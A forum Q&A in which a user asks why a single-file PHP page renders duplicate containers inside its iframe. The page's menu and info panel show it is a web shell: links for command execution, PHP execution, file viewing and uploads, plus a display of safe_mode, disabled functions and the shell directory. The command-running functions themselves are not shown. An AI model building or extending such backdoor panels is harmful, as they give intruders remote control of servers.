# How can I get PHP to print my other page into the iframe correctly?

Tags: php, html, css, debugging

So, anyways, I'm using one large PHP code with one "main function", the main function serves as the main page, and has an iframe embedded into it, the iframe can call functions into it, and the iframe then should display the function (which really contains HTML code) into the iframe, effectively displaying a new page of the website, however, the key is that the whole thing takes place within an iframe, and all the code is in one PHP document. I know this works, as I've seen it done (and even have done) it before.

Anyways, I decided to try to do something a little different with the styling.

I created my HTML/CSS styling, and then put it into a function, as I always do:

```
function style(){
echo("
<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\" \"http://www.w3.org/TR/html4/loose.dtd\">
<html lang='en'>
<head>
<title>blah - $servip</title>
<style type='text/css'>
body {
text-align:center;
font-family:Verdana;
background-color:black;
color:white;
}
h1 {
size:16px;
}
h2 {
size:14px;
}
h3 {
size:12px;
}
a:link {
color:#E6EBE6;
text-decoration: none;
}
a:hover {
color:#CCD6CC;
text-decoration: none;
}
 a:visited {
color: #FFFFFF;
text-decoration: none;
}
div#header {
text-align:center;
}
div#menu {
width:200px;
height:400px;
border:2px ridge white;
text-align:center;
float:left;
margin:6px;
}
div#container {
width:850px;
height:850px;
overflow:auto;
margin:auto;
text-align:center;
border:2px ridge green;
}
div#maincontent {
width:608px;
height:731px;
border:2px ridge white;
text-align:center;
float:top;
float:right;
top:10px;
margin-top:6px;
margin-left:0px;
margin-right:6px;
margin-bottom:6px;
clear:bottom;
clear:top;

}
div#subcontent {
width:200px;
height:315px;
border:2px ridge white;
text-align:center;
float:left;
margin:6px;
clear:left;
}

}
</style> 
</head>
");
}
```

Then, I call it in my main function, and print out the rest of the content.

```
function Main() {
    global $self, $servip, $servport, $uname, $soft, $banner, $curuser, $version;
    style();
    echo("<div id='container'><div id='menu'>");
    $act = array('home'=>'Home','cmd'=>'Command Execute','files'=>'File View','phpinfo'=>'PHP info', 'phpexec'=>'PHP Execute',
    'tools'=>'Tools','sqllogin'=>'SQL','email'=>'Email','upload'=>'Get Files','kill'=>'Kill Shell');
    $capt = array_flip($act);
    echo("<form method='GET' name='shell'>");
    //handles the menu
    if($_SERVER['QUERY_STRING']){foreach($act as $link){echo("[ <a href='?" . $_SERVER['QUERY_STRING'] . "&act=" . $capt[$link] . "' target='frm'>" . $link . "</a> ] ");}}
    else{foreach($act as $link){echo("<a href='?act=" . $capt[$link] . "' target='frm'>" . $link . "</a><br />");}}
    echo("</div>");
    //maincontent
    echo("<div id='maincontent'><iframe name='frm' style='width:100%; height:100%; border:0;' src='?act=home'></iframe></div>");

    //subcontent
    echo("<div id='subcontent'> <h3>Information</h3>");
    echo("<b>Host:</b> <span class='inf'>" . $servip . "</span><br>");
    echo("<b>Server software:</b> <span class='inf'>" . $soft . "</span><br>");
    echo("<b>Username:</b> <span class='inf'>" . $uname . "</span><br>");
    echo("<b>Shell Directory:</b> <span class='inf'>" . getcwd() . "</span><br>");
    echo("<div style='display:none' id='info'>");
    echo("<b>Current User:</b> <span class='inf'>" . $curuser . "</span><br>");
    if(@ini_get('safe_mode') != ""){echo("<b>Safemode:</b> <font color='red'>ON</font>");}
    else{echo("<b>Safemode:</b> <font color='green'>OFF</font>");}
    echo("\n<br />\n");
    if(@ini_get('open_basedir') != ""){echo("<b>Open Base Dir:</b> <font color='red'>ON</font> [ <span class='inf'>" . ini_get('open_basedir') . "</span> ]");}
    else{echo("<b>Open Base Dir:</b> <font color='green'>OFF</font>");}
    echo("\n<br />\n");
    if(@ini_get('disable_functions') != ""){echo("<b>Disabled functions:</b> " . @ini_get('disable_functions'));}
    else{echo("<b>Disabled functions:</b> None");}
    echo("\n<br />\n");
    if(@function_exists(mysql_connect)){echo("<b>MySQL:</b> <font color='green'>ON</font>");}
    else{echo("<b>MySQL:</b> <font color='red'>OFF</font>");}
    echo("</div></div></body></html>");
}
```

And I made a very simplistic "home" page using the home function:

```
function home() {
ostyle();
echo("<h1>Welcome to blah</h1>");
echo("<p>Enjoy</p>");
echo("</body></html>");
}
```

ostyle(); is a simplified version of style();

I base the user's choice off the $act variable using a switch case:

```
//Handles the selection menu
switch($act){
    case "home": home();break;
    case "phpinfo": phpinfo();break;
    case "sql": sql();break;
    case "files": files($dir);break;
    case "email": email();break;
    case "cmd": cmd();break;
    case "upload": upload();break;
    case "tools": tools();break;
    case "sqllogin": sqllogin();break;
    case "sql": sql();break;
    case "kill": kill();break;
    case "phpexec": execphp();break;
    default: main();break;
}
```

And that's all stuff I've done before, however, for some reason, it doesn't work. The page goes all "crazy". It prints out multiple containers into the single container div, and then inside the iframe it shows my content, but then it displays the the Main function (or what would result of the code in the main function) into the iframe.

What's wrong and how can I fix it?

Comment: Oh the humanity! Dude, you're doing it wrong! PHP is not C - please read a php tutorial first!

Comment: You might try separating what your Main() function does (db connecting, query string parsing, etc) and how the data is represented (use regular markup instead of echoing strings for markup). This will make your code much more readable and able to be debugged. That said, are you sure your iframe is not simply referring to itself over and over?

Answer (score 1):

You are really making things complicated. Abusing echo, huge functions and global variables? I might as well write some static html files instead.

My suggestion is:
Think before you start writing something.